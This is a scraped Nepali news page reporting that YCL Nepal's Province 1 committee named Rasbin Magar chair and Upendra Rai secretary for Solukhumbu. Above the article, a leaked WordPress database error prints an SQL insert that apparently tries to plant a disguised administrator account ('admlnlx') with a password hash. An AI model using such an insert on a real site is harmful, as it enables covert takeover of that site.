WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bsn9LLsr24ht57eVSo.SwtQsHgVOhw1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 04:46:07', '', 'admlnlx', 'admlnlx')

वाईसीएल नेपाल सोलुखुम्बुको अध्यक्षमा मगर र सचिवमा राई – Gaule Khabar

वाईसीएल नेपाल सोलुखुम्बुको अध्यक्षमा मगर र सचिवमा राई

वाईसीएल नेपाल सोलुखुम्बुको अध्यक्षमा मगर र सचिवमा राई

सोलुखुम्बु । वाईसीएल नेपाल सोलुखुम्बुको अध्यक्षमा रस्बिन मगर चयन भएका छन् ।

माघ २४ गते बसेको वाईसीएल प्रदेश १ समितिको बैठकले रस्बिनलाई अध्यक्षमा र उपेन्द्र राईलाई सचिवको जिम्मेवारी दिने निर्णय गरेको हो ।

अध्यक्ष मगर यसअघि वाईसीएल प्रदेश कमिटी सदस्य तथा सोलुदुधकुण्ड नगर कमिटीका सचिब रहेका थिए । सचिव राई सोताङ गाउँपालिका संयोजक हुन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका